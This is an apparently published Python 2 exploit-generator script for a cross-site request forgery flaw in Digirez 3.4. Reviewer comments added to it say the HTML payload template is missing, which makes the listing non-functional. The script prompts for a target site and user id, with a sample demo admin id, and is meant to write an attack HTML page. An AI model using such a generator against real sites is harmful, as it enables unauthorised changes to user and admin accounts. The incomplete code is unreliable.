#!/usr/local/bin/python
#
# Exploit Title: Digirez 3.4 - Cross-Site Request Forgery (Update User & Admin)
# Dork: N/A
# Date: 18.09.2017
# Vendor Homepage: http://www.digiappz.com/
# Software Link: http://www.digiappz.com/index.asp
# Demo: http://www.digiappz.com/room/index.asp
# Version: 3.4
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
#
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
#
# NOTE(review): Python 2 script (print statement, raw_input). It only
# generates a local HTML file from a template plus two prompted values; it
# sends nothing itself. The vulnerability class is a state-changing request
# accepted without a per-session anti-CSRF token; the fix is server-side
# (token check and/or SameSite cookies), not anything in this file.
# NOTE(review): this listing has been flattened and the HTML template body is
# missing -- the csrfhtmlcode literal below contains only a line break, so
# the "%" substitution raises TypeError before any file is written.

import os
import urllib  # imported but not used anywhere in this listing

# Clear the terminal before printing the banner (cosmetic only).
if os.name == 'nt':
    os.system('cls')
else:
    os.system('clear')

def csrfexploit():
    """Prompt for a target URL and user id, fill the HTML template, write it.

    Reads two values from stdin, formats them into csrfhtmlcode with "%",
    then writes the result to <name>.html in the current directory.
    No return value; raises TypeError if the template has no "%s" slots
    (as in this listing).
    """
    # Banner text; original line breaks were lost when the listing was
    # flattened, so it is kept here exactly as it appears on the page.
    e_baslik = ''' ################################################################################ ______ _______ ___ _ __ _____ _______ ___________ _ __ / _/ / / / ___// | / | / / / ___// ____/ | / / ____/ | / | / / / // /_/ /\__ \/ /| | / |/ / \__ \/ __/ / |/ / / / /| | / |/ / _/ // __ /___/ / ___ |/ /| / ___/ / /___/ /| / /___/ ___ |/ /| / /___/_/ /_//____/_/ |_/_/ |_/ /____/_____/_/ |_/\____/_/ |_/_/ |_/ WWW.IHSAN.NET ihsan[@]ihsan.net + Digirez 3.4 - CSRF (Update Admin) ################################################################################ '''
    print e_baslik
    # Both inputs are taken verbatim and interpolated into the template; the
    # script performs no validation of the URL or id.
    url = str(raw_input(" [+] Enter The Target URL (Please include http:// or https://) \n Demo Site:http://digiappz.com/room: "))
    id = raw_input(" [+] Enter The User ID \n (Demo Site Admin ID:8565): ")  # shadows the builtin id()
    # Template is empty in this listing (see header note): "\n" % (url, id)
    # fails with "not all arguments converted during string formatting".
    csrfhtmlcode = '''
''' %(url, id)
    print " +----------------------------------------------------+\n [!] The HTML exploit code for exploiting this CSRF has been created."
    print(" [!] Enter your Filename below\n Note: The exploit will be saved as 'filename'.html \n")
    extension = ".html"
    name = raw_input(" Filename: ")
    filename = name+extension
    # Output path is built directly from user input; no "with" block, so the
    # handle is not closed if write() raises. "file" shadows the Python 2 builtin.
    file = open(filename, "w")
    file.write(csrfhtmlcode)
    file.close()
    # Under Python 2 the print statement takes ("...") % filename as one
    # expression, so this formats correctly; under Python 3 print() returns
    # None and the trailing "% filename" would raise TypeError.
    print(" [+] Your exploit is saved as %s")%filename
    print("")

csrfexploit()